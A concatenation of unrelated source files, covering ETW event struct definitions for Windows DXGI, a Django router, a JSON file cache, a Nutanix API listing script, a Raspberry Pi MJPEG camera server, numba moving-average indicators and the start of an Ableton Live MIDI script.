pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=850, version=0)
class Microsoft_Windows_DXGI_850_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=851, version=0)
class Microsoft_Windows_DXGI_851_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=852, version=0)
class Microsoft_Windows_DXGI_852_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pWidth" / Int64ul,
"pHeight" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=853, version=0)
class Microsoft_Windows_DXGI_853_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=854, version=0)
class Microsoft_Windows_DXGI_854_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"BufferToPresent" / Int32ul,
"SyncInterval" / Int32ul,
"Flags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=855, version=0)
class Microsoft_Windows_DXGI_855_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=856, version=0)
class Microsoft_Windows_DXGI_856_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"MaxLatency" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=857, version=0)
class Microsoft_Windows_DXGI_857_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=858, version=0)
class Microsoft_Windows_DXGI_858_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pMaxLatency" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=859, version=0)
class Microsoft_Windows_DXGI_859_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=860, version=0)
class Microsoft_Windows_DXGI_860_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=861, version=0)
class Microsoft_Windows_DXGI_861_0(Etw):
pattern = Struct(
"m_Ret" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=862, version=0)
class Microsoft_Windows_DXGI_862_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul,
"Rect" / Int32sl
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=863, version=0)
class Microsoft_Windows_DXGI_863_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=864, version=0)
class Microsoft_Windows_DXGI_864_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul,
"Rect" / Int32sl
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=865, version=0)
class Microsoft_Windows_DXGI_865_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=866, version=0)
class Microsoft_Windows_DXGI_866_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"Width" / Int32ul,
"Height" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=867, version=0)
class Microsoft_Windows_DXGI_867_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=868, version=0)
class Microsoft_Windows_DXGI_868_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=869, version=0)
class Microsoft_Windows_DXGI_869_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=870, version=0)
class Microsoft_Windows_DXGI_870_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pRect" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=871, version=0)
class Microsoft_Windows_DXGI_871_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=872, version=0)
class Microsoft_Windows_DXGI_872_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pWidth" / Int64ul,
"pHeight" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=873, version=0)
class Microsoft_Windows_DXGI_873_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=874, version=0)
class Microsoft_Windows_DXGI_874_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"YCbCrFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=875, version=0)
class Microsoft_Windows_DXGI_875_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=876, version=0)
class Microsoft_Windows_DXGI_876_0(Etw):
pattern = Struct(
"pThis" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=877, version=0)
class Microsoft_Windows_DXGI_877_0(Etw):
pattern = Struct(
"YCbCrFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=878, version=0)
class Microsoft_Windows_DXGI_878_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pMatrix" / Int64ul,
"Matrix" / Float32l
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=879, version=0)
class Microsoft_Windows_DXGI_879_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=880, version=0)
class Microsoft_Windows_DXGI_880_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"pMatrix" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=881, version=0)
class Microsoft_Windows_DXGI_881_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=882, version=0)
class Microsoft_Windows_DXGI_882_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"SyncInterval" / Int32ul,
"Flags" / Int32ul,
"PartnerFlags" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=883, version=0)
class Microsoft_Windows_DXGI_883_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=884, version=0)
class Microsoft_Windows_DXGI_884_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"Duration" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=885, version=0)
class Microsoft_Windows_DXGI_885_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=886, version=0)
class Microsoft_Windows_DXGI_886_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"DesiredPresentDuration" / Int32ul,
"pClosestSmallerPresentDuration" / Int64ul,
"pClosestLargerPresentDuration" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=887, version=0)
class Microsoft_Windows_DXGI_887_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=888, version=0)
class Microsoft_Windows_DXGI_888_0(Etw):
pattern = Struct(
"pThis" / Int64ul,
"iOutput" / Int32ul,
"iOutputType" / Int32ul,
"ppOutput" / Int64ul
)
@declare(guid=guid("ca11c036-0102-4a2d-a6ad-f03cfed5d3c9"), event_id=889, version=0)
class Microsoft_Windows_DXGI_889_0(Etw):
pattern = Struct(
"m_Ret" / Int32ul
)
|
StarcoderdataPython
|
1678630
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .views import SharingViewSets, CommentViewSets, LikesToSharingViewSets
router = DefaultRouter()
# sharing
router.register('sharing', SharingViewSets)
# likesToSharing
router.register('likes', LikesToSharingViewSets)
# comments
router.register('comments', CommentViewSets)
app_name = 'sharing'
urlpatterns = [
path(r'', include(router.urls)),
]
|
StarcoderdataPython
|
3265923
|
#-*- encoding: utf-8 -*-
import os
import sys
import glob
import json
import hashlib
# Create cache dir in project root
cache = os.sep.join(__file__.split(os.sep)[:-2])+os.sep+"cache"
try:
    os.mkdir(cache)
except OSError:
    pass  # directory already exists
def _delete_file(filename):
''' delete a file '''
os.remove(cache+os.sep+filename)
def _safe_size(payload, limit):
    ''' return False if the payload exceeds the size limit (in KiB) '''
    limit = limit * 1024
    size = len(payload.encode('utf-8'))  # serialized size, not sys.getsizeof object overhead
    if size > limit:
        return False
    return True
def _file_write(content, file_link_hash):
    ''' write content to a cache file, encoding str to bytes for binary mode '''
    if isinstance(content, str):
        content = content.encode('utf-8')
    with open(cache+os.sep+file_link_hash, 'wb') as fs:
        fs.write(content)
    return True
def _file_load(file_link_hash):
''' return content of file as dictionary '''
try:
with open(cache+os.sep+file_link_hash, 'rb') as fs:
payload = fs.read()
except IOError:
return False
return payload
def _file_link(content):
    ''' generate a stable hash of the content, used as the cache filename
        (hashlib instead of built-in hash(), which is randomized per interpreter run) '''
    return hashlib.md5(content.encode('utf-8')).hexdigest().upper()
def get_history(conf):
''' returns list of files from history,
and removes the oldest if list exceeds cache limit '''
limit = conf['link_history_size']
files = glob.glob(cache+os.sep+"*")
files.sort(key=os.path.getmtime)
    list_of_links = [f.split(os.sep)[-1] for f in reversed(files)]
if len(list_of_links) > limit:
_delete_file(list_of_links[-1])
list_of_links = list_of_links[:-1]
return list_of_links
def save_content(payload, conf):
''' save content to a file if file does not exceed
link_history_file_size '''
limit = conf['link_history_file_size']
    content = json.dumps(payload, ensure_ascii=False)  # the 'encoding' kwarg was removed in Python 3
if _safe_size(content, limit):
link = _file_link(content)
_file_write(content, link)
else:
return "size_limit_exceeded!"
return link
def load_content(link_id):
''' get file content, return as dictionary '''
content = _file_load(link_id)
    try:
        payload = json.loads(content)
    except (ValueError, TypeError):
        # missing cache file (content is False) or malformed JSON
        return False
return payload
# -- testing --
#from render_state import mash
#link = save_content(payload)
#data = load_content(link)
#print mash(data['grains'][0], data['pillar'][0], data['state'][0])[0]
|
StarcoderdataPython
|
5022081
|
from JDI.web.selenium.elements.base.clickable import Clickable
from JDI.web.selenium.elements.common.text import Text
class ClickableText(Clickable, Text):
def __init__(self, by_locator=None, web_element=None):
if by_locator is not None:
super(ClickableText, self).__init__(by_locator=by_locator)
elif web_element is not None:
super(ClickableText, self).__init__(web_element=web_element)
else:
super(ClickableText, self).__init__()
|
StarcoderdataPython
|
6622114
|
<gh_stars>1-10
from .bases import *
from .crawlino_model import *
from .plugins_models import *
from .input_model import *
|
StarcoderdataPython
|
3383124
|
<reponame>sgriffith3/2022-01-04-Python
car = input("Whatchoo got? ")
print(car)
|
StarcoderdataPython
|
6612265
|
<reponame>DanSeraf/spyd
from spyd.registry_manager import register
from spyd.utils.dictionary_get import dictget
@register('client_message_handler')
class EditentHandler(object):
message_type = 'N_EDITENT'
@staticmethod
def handle(client, room, message):
player = client.get_player()
entity_id = message['entid']
entity_type = message['type']
x, y, z = dictget(message, 'x', 'y', 'z')
attrs = message['attrs']
room.handle_player_event('edit_entity', player, entity_id, entity_type, x, y, z, attrs)
|
StarcoderdataPython
|
9719750
|
<reponame>coderMaruf/leetcode-1<filename>2020_July_Leetcode_30_days_challenge/Week_2_Subsets/by_bitmap.py<gh_stars>10-100
'''
Description:
Given a set of distinct integers, nums, return all possible subsets (the power set).
Note: The solution set must not contain duplicate subsets.
Example:
Input: nums = [1,2,3]
Output:
[
[3],
[1],
[2],
[1,2,3],
[1,3],
[2,3],
[1,2],
[]
]
'''
class Solution:
def subsets(self, nums):
size = len(nums)
upper_bound = 1 << size
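        # Each serial_num in [0, 2**size) is a bitmask: bit i set means nums[i] belongs to that subset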
solution = [ [ nums[i]for i in range(size) if serial_num & (1<<i) ] for serial_num in range(upper_bound)]
return solution
# n : the length of input list
## Time Complexity: O( 2^n )
#
# The overhead in time is the cost of subset generation, which is of O( 2^n )
## Space Complexity: O( 2^n )
#
# The overhead in space is the storage for all subsets, which is of O( 2^n )
import unittest
class Testing( unittest.TestCase ):
def test_case_1( self ):
result = Solution().subsets( nums = [1,2,3] )
self.assertCountEqual(result, [ [3], [1], [2], [1,2,3], [1,3], [2,3], [1,2], [] ] )
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
9798483
|
<reponame>halsayed/whmcs-demo
import os
import base64
import requests
# disable ssl warnings
import urllib3
urllib3.disable_warnings()
# API configuration and parameters ...
pc_address = '10.38.15.9'
username = 'admin'
password = os.environ.get('PASSWORD', '<PASSWORD>!') # change the password to a suitable value
authorization = base64.b64encode(f'{username}:{password}'.encode()).decode()
url = f'https://{pc_address}:9440/api/nutanix/v3'
kwargs = {
'verify': False,
'headers': {'Authorization': f'Basic {authorization}'}
}
# ==========================================================================================
# List the available clusters (PEs) connected to this Prism Central
# ==========================================================================================
payload = {'kind': 'cluster'}
resp = requests.post(f'{url}/clusters/list', json=payload, **kwargs)
if resp.status_code == 200:
count = 1
print('\n==========================\nAvailable Clusters\n==========================')
for cluster in resp.json()['entities']:
# Note: PC itself is a cluster, but it cannot be used as a resource to provision VMs,
# check for 'AOS' type cluster to run VMs
if 'AOS' in cluster['status']['resources']['config'].get('service_list', []):
print(f'({count}) Name: {cluster["status"]["name"]},\t UUID: {cluster["metadata"]["uuid"]}')
count += 1
else:
print(f'ERROR - API call failed, status code: {resp.status_code}, message: {resp.content}')
# ==========================================================================================
# List the available Networks
# ==========================================================================================
payload = {'kind': 'subnet', 'length': 999}
resp = requests.post(f'{url}/subnets/list', json=payload, **kwargs)
if resp.status_code == 200:
count = 1
print('\n==========================\nAvailable Subnets\n==========================')
for subnet in resp.json()['entities']:
print(f'({count}) Name: {subnet["status"]["name"]},\t UUID: {subnet["metadata"]["uuid"]}')
count += 1
else:
print(f'ERROR - API call failed, status code: {resp.status_code}, message: {resp.content}')
# ==========================================================================================
# List the available Images
# ==========================================================================================
payload = {'kind': 'image', 'length': 999}
resp = requests.post(f'{url}/images/list', json=payload, **kwargs)
if resp.status_code == 200:
count = 1
print('\n==========================\nAvailable Images\n==========================')
for image in resp.json()['entities']:
print(f'({count}) Name: {image["spec"]["name"]},\t UUID: {image["metadata"]["uuid"]}')
count += 1
else:
print(f'ERROR - API call failed, status code: {resp.status_code}, message: {resp.content}')
|
StarcoderdataPython
|
5067050
|
# Copyright (c) 2018 Graphcore Ltd. All rights reserved.
import sys
import os
import c10driver
import cmdline
import popart
from popart.torch import torchwriter
#we require torch in this file to create the torch Module
import torch
args = cmdline.parse()
nChans = 3
# process batchSize = 2 samples at a time,
# so weights updated on average gradient of
# batchSize = 2 samples. batchSize
# is EXACTLY the batch size.
batchSize = 2
# Return requested tensors every batchesPerStep = 3 cycles.
# so only communicate back to host every 2*3 = 6 samples.
batchesPerStep = 3
# anchors, and how they are returned: in this example,
# return the l1 loss "out",
# and the input tensor "image0"
anchors = {
"out": popart.AnchorReturnType("Final"),
"image0": popart.AnchorReturnType("Final")
}
dataFlow = popart.DataFlow(batchesPerStep, anchors)
# willow is non-dynamic. All input Tensor shapes and
# types must be fed into the Session constructor.
# In this example there is 1 streamed input, image0.
inputShapeInfo = popart.InputShapeInfo()
inputShapeInfo.add("image0",
popart.TensorInfo("FLOAT", [batchSize, nChans, 32, 32]))
inNames = ["image0"]
outNames = ["out"]
#cifar training data loader : at index 0 : image, at index 1 : label.
cifarInIndices = {"image0": 0}
class Module0(torch.nn.Module):
def __init__(self):
torch.nn.Module.__init__(self)
self.conv1 = torch.nn.Conv2d(nChans,
nChans,
kernel_size=(3, 3),
stride=1,
padding=(1, 3),
bias=False)
def forward(self, inputs):
"""out = relu(conv(in))"""
image0 = inputs[0]
x = self.conv1(image0)
x = torch.sum(x, dim=1)
x = torch.sum(0.1 * torch.abs(x))
return x
# Set arbitrary seed so model weights are initialized to the
# same values each time the test is run
torch.manual_seed(1)
torchWriter = torchwriter.PytorchNetWriter(
inNames=inNames,
outNames=outNames,
optimizer=popart.ConstSGD(0.001),
inputShapeInfo=inputShapeInfo,
dataFlow=dataFlow,
### Torch specific:
module=Module0(),
samplesPerBatch=batchSize)
c10driver.run(torchWriter, None, args.outputdir, cifarInIndices, args.device,
args.hw_id)
|
StarcoderdataPython
|
1885405
|
#!/usr/bin/python3
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from picamera import PiCamera
class MjpegMixin:
"""
Add MJPEG features to a subclass of BaseHTTPRequestHandler.
"""
mjpegBound = 'eb4154aac1c9ee636b8a6f5622176d1fbc08d382ee161bbd42e8483808c684b6'
frameBegin = 'Content-Type: image/jpeg\n\n'.encode('ascii')
frameBound = ('\n--' + mjpegBound + '\n').encode('ascii') + frameBegin
def mjpegBegin(self):
self.send_response(200)
self.send_header('Content-Type',
'multipart/x-mixed-replace;boundary=' + MjpegMixin.mjpegBound)
self.end_headers()
self.wfile.write(MjpegMixin.frameBegin)
def mjpegEndFrame(self):
self.wfile.write(MjpegMixin.frameBound)
class SmoothedFpsCalculator:
"""
Provide smoothed frame per second calculation.
"""
def __init__(self, alpha=0.1):
self.t = time.time()
self.alpha = alpha
self.sfps = None
def __call__(self):
t = time.time()
d = t - self.t
self.t = t
fps = 1.0 / d
if self.sfps is None:
self.sfps = fps
else:
self.sfps = fps * self.alpha + self.sfps * (1.0 - self.alpha)
return self.sfps
class Handler(BaseHTTPRequestHandler, MjpegMixin):
def do_GET(self):
if self.path == '/contour.mjpeg':
self.handleContourMjpeg()
else:
self.send_response(404)
self.end_headers()
def handleContourMjpeg(self):
import cv2
import numpy as np
width, height, blur, sigma = 640, 480, 2, 0.33
fpsFont, fpsXY = cv2.FONT_HERSHEY_SIMPLEX, (0, height-1)
self.mjpegBegin()
with PiCamera() as camera:
camera.resolution = (width, height)
camera.video_denoise = False
camera.image_effect = 'blur'
camera.image_effect_params = (blur,)
yuv = np.empty((int(width * height * 1.5),), dtype=np.uint8)
sfps = SmoothedFpsCalculator()
for x in camera.capture_continuous(yuv, format='yuv', use_video_port=True):
image = yuv[:width*height].reshape((height, width))
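                # Auto-Canny: derive hysteresis thresholds as a +/- sigma band around the median intensity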
v = np.median(image)
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
image = cv2.Canny(image, lower, upper)
cv2.putText(image, '%0.2f fps' %
sfps(), fpsXY, fpsFont, 1.0, 255)
self.wfile.write(cv2.imencode('.jpg', image)[1])
self.mjpegEndFrame()
def run(port=8000):
httpd = HTTPServer(('', port), Handler)
httpd.serve_forever()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='HTTP streaming camera.')
parser.add_argument('--port', type=int, default=8000,
help='listening port number')
args = parser.parse_args()
run(port=args.port)
|
StarcoderdataPython
|
1678660
|
<filename>python_teste/python_aulas/aula_96.py<gh_stars>1-10
def area(a, b):
ar = a * b
    print(f'The area of a {a:.1f}x{b:.1f} plot is {ar:.1f}m²')
# Main program
largura = float(input('Width: '))
comprimento = float(input('Length: '))
area(largura, comprimento)
|
StarcoderdataPython
|
225732
|
<reponame>David100459/final
from django.db import models
# Create your models here.
class student(models.Model):
    first_name = models.CharField(max_length=50)
last_name = models.CharField(max_length=50)
code = models.CharField(max_length=10)
created_at = models.DateTimeField()
class subject(models.Model):
name = models.CharField(max_length=50)
code = models.CharField(max_length=10)
course = models.CharField(max_length=3)
created_at = models.DateTimeField()
class subject2(models.Model):
id_student = models.ForeignKey(student, on_delete=models.CASCADE)
id_subject = models.ForeignKey(subject, on_delete=models.CASCADE)
created_at = models.DateTimeField()
|
StarcoderdataPython
|
4831074
|
import cv2
import pandas as pd
def extract_SURF_data(inputpath, outputpath):
img = cv2.imread(inputpath)
surf = cv2.xfeatures2d.SURF_create(4000)
kps, features = surf.detectAndCompute(img, None)
kps_data = []
for kp in kps:
        # Keypoint X, Y (left-to-right 0~255, top-to-bottom 0~255), keypoint angle, keypoint diameter
# print(kp.pt[0], kp.pt[1], kp.angle, kp.size)
kps_data.append([kp.pt[0], kp.pt[1], kp.angle, kp.size])
    # Normalize to exactly 15 keypoints (pad with zeros or truncate)
kps_data_len = len(kps_data)
if kps_data_len < 15:
for i in range(15-kps_data_len):
kps_data.append([0, 0, 0, 0])
elif kps_data_len > 15:
del kps_data[15:]
    # Sort by keypoint diameter (kp.size), largest first
kps_data.sort(key=lambda x: x[3], reverse=True)
titles = ['x', 'y', 'angle', 'diameter']
dt = pd.DataFrame(kps_data, columns=titles)
sheet_name = inputpath.split('/')[-1][:-4]
dt.to_excel(outputpath, sheet_name=sheet_name, index=0)
|
StarcoderdataPython
|
4994708
|
<filename>Support/Fuego/Pythia/pythia-0.4/packages/pyre/pyre/graph/Graph.py
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# <NAME>
# California Institute of Technology
# (C) 1998-2003 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from Drawable import Drawable
from Node import Node
from Edge import Edge
class Graph(Drawable):
# nameless nodes set defaults for subsequent nodes
def node(self, id=""):
node = Node(id)
self._nodes.append(node)
return node
def connect(self, source, sinks):
edge = Edge(source, sinks)
self._edges.append(edge)
return edge
def __init__(self, name):
Drawable.__init__(self)
self._graph = ""
self._nodes = []
self._edges = []
self._id = name
return
_validAttributes = {
"center" : ["true", "false"],
"clusterrank" : ["local", "global", "none"],
"color" : None,
"concentrate": ["true", "false"],
"fontcolor" : None,
"fontname" : None,
"fontsize" : None,
"label" : None,
"layers" : None,
"margin" : None,
"mclimit" : None,
"nodesep" : None,
"nslimit" : None,
"ordering" : None,
"orientation" : None,
"page" : None,
"rank" : None,
"rankdir" : None,
"ranksep" : None,
"ratio" : None,
"size" : None
}
# version
__id__ = "$Id$"
#
# End of file
|
StarcoderdataPython
|
5013308
|
import numpy as np
import numba as nb
import pandas as pd
import qnt.ta.ndadapter as nda
import typing as tp
import time
import sys
from qnt.log import log_info, log_err
@nb.jit(nb.float64[:](nb.float64[:], nb.int64), nopython=True)
def lwma_np_1d(series: np.ndarray, periods: int) -> np.ndarray:
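    # 'tail' is a circular buffer of the last `periods` non-NaN samples; weights fall
    # linearly from `periods` (newest sample) down to 1 (oldest), hence "linear" WMA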
tail = np.empty((periods,), dtype=np.double)
not_nan_cnt = 0
result = np.full(series.shape, np.nan, dtype=np.double)
w_sum = periods * (periods + 1) / 2
for i in range(series.shape[0]):
if not np.isnan(series[i]):
idx = not_nan_cnt % periods
tail[idx] = series[i]
not_nan_cnt += 1
if not_nan_cnt >= periods:
sum = 0
for j in range(periods):
w = (periods - j)
sum += tail[idx - j] * w
result[i] = sum / w_sum
return result
@nb.jit(nb.float64[:](nb.float64[:], nb.float64[:]), nopython=True, error_model="numpy")
def wma_np_1d(series: np.ndarray, weights: np.ndarray) -> np.ndarray:
periods = len(weights)
tail = np.empty((periods,), dtype=np.double)
not_nan_cnt = 0
result = np.full(series.shape, np.nan, dtype=np.double)
w_sum = weights.sum()
for i in range(series.shape[0]):
if not np.isnan(series[i]):
idx = not_nan_cnt % periods
tail[idx] = series[i]
not_nan_cnt += 1
if not_nan_cnt >= periods:
sum = 0
for j in range(periods):
sum += tail[idx - j] * weights[j]
result[i] = sum / w_sum
return result
@nb.jit(nb.float64[:](nb.float64[:], nb.float64[:], nb.int64), nopython=True, error_model="numpy")
def vwma_np_1d(price: np.ndarray, volume: np.ndarray, periods:int) -> np.ndarray:
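    # Rolling volume-weighted average; a sample counts only when both price and volume are non-NaN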
price_tail = np.empty((periods,), dtype=np.double)
volume_tail = np.empty((periods,), dtype=np.double)
not_nan_cnt = 0
result = np.full(price.shape, np.nan, dtype=np.double)
for i in range(price.shape[0]):
if not np.isnan(price[i]) and not np.isnan(volume[i]):
idx = not_nan_cnt % periods
price_tail[idx] = price[i]
volume_tail[idx] = volume[i]
not_nan_cnt += 1
if not_nan_cnt >= periods:
result[i] = (price_tail * volume_tail).sum() / volume_tail.sum()
return result
last_alert = 0
def wma(series: nda.NdType, weights: tp.Union[tp.List[float], np.ndarray] = None) -> nda.NdType:
"""
:param weights: weights in decreasing order. lwma(series, 3) == wma(series, [3,2,1])
"""
global last_alert
if (weights is None or type(weights) is int):
if time.time() - last_alert > 60:
last_alert = time.time()
log_err("Warning! wma(series:ndarray, periods:int) deprecated. Use lwma instead of wma.")
return lwma(series,weights)
if type(weights) is list:
weights = np.array(weights, np.float64)
return nda.nd_universal_adapter(wma_np_1d, (series,), (weights,))
def lwma(series: nda.NdType, periods: int = 20):
return nda.nd_universal_adapter(lwma_np_1d, (series,), (periods,))
def vwma(price: nda.NdType, volume: nda.NdType, periods: int = 20):
return nda.nd_universal_adapter(vwma_np_1d, (price, volume), (periods,))
if __name__ == '__main__':
log_info(np.divide(1., 0.))
d1_array = np.array([0, 1, 2, 3, 4, np.nan, 5, np.nan, 6, 7], np.double)
d1_result_lwma = lwma(d1_array, 3)
d1_result_wma = wma(d1_array, [3, 2, 1])
d1_result_vwma = vwma(d1_array, d1_array, 3)
log_info("d1_array:\n", d1_array, '\n')
log_info('d1_result_lwma:\n', d1_result_lwma)
log_info('d1_result_wma:\n', d1_result_wma)
log_info('d1_result_vwma:\n', d1_result_vwma)
log_info('---')
np_array = np.array([
[
[1, 2, 3, 4],
[5, 6, 7, 8],
], [
[2, 3, 4, 5],
[6, 7, 8, 9],
]
], np.double)
np_result = lwma(np_array, 2)
log_info("np_array:\n", np_array, '\n')
log_info('np_result:\n', np_result)
log_info('---')
date_rng = pd.date_range(start='2018-01-01', end='2018-01-04', freq='D')
df_array = pd.DataFrame(date_rng, columns=['time']).set_index('time')
    df_array['close'] = np.array([1, 2, 3, 4], dtype=np.float64)
    df_array['open'] = np.array([5, 6, 7, 8], dtype=np.float64)
df_result = lwma(df_array, 2)
log_info("df_array:\n", df_array, '\n')
log_info('df_result:\n', df_result)
log_info('---')
xr_array = df_array.to_xarray().to_array("field")
xr_result = lwma(xr_array, 2)
log_info("xr_array:\n", xr_array.to_pandas(), '\n')
log_info('xr_result:\n', xr_result.to_pandas())
log_info('---')
from qnt.data import load_data, load_assets, ds
from qnt.xr_talib import WMA
import time
assets = load_assets()
ids = [i['id'] for i in assets[0:2000]]
data = load_data(assets=ids, dims=(ds.TIME, ds.ASSET, ds.FIELD), forward_order=True)
price = data.sel(field='close')
vol = data.sel(field='vol')
t1 = time.time()
ma1 = WMA(price, 25)
t2 = time.time()
ma2 = lwma(price, 25)
t3 = time.time()
log_info(
"relative delta =", abs((ma1.fillna(0) - ma2.fillna(0)) / data).max().values,
"t(talib)/t(lwma) =", (t2 - t1) / (t3 - t2)
)
ma_lw = lwma(price, 3)
ma_w = wma(price, [3, 2, 1])
log_info("abs(ma_lw - ma_w).sum() = ", abs(ma_lw - ma_w).fillna(0).sum().values)
ma_vw = vwma(price, vol, 3)
|
StarcoderdataPython
|
311164
|
<filename>ZeRO_SLMkII/ZeRO_SLMkII.py
import Live
import MidiRemoteScript
from MixerController import MixerController
from DisplayController import DisplayController
from consts import *
class ZeRO_SLMkII():
def __init__(self, c_instance):
self.__c_instance = c_instance
self.__c_instance.log_message("Setting up ZeRO_SLMkII.")
self.__automap_has_control = False
self.__display_controller = DisplayController(self, c_instance)
self.__mixer_controller = MixerController(self, self.__display_controller, c_instance)
self.__components = [self.__mixer_controller, self.__display_controller]
self.__update_hardware_delay = -1
def disconnect(self):
"""Called right before we get disconnected from Live
"""
for c in self.__components:
c.disconnect()
self.send_midi(ALL_LEDS_OFF_MESSAGE)
self.send_midi(GOOD_BYE_SYSEX_MESSAGE)
def song(self):
"""returns a reference to the Live song instance that we do control
"""
return self.__c_instance.song()
def can_lock_to_devices(self):
"""Live -> Script
Live can ask the script whether it can be locked to devices
"""
return False
def supports_pad_translation(self):
return True
def instance_identifier(self):
return self.__c_instance.instance_identifier()
def connect_script_instances(self, instanciated_scripts):
"""
Called by the Application as soon as all scripts are initialized.
You can connect yourself to other running scripts here, as we do it
connect the extension modules (MackieControlXTs).
"""
pass
def request_rebuild_midi_map(self):
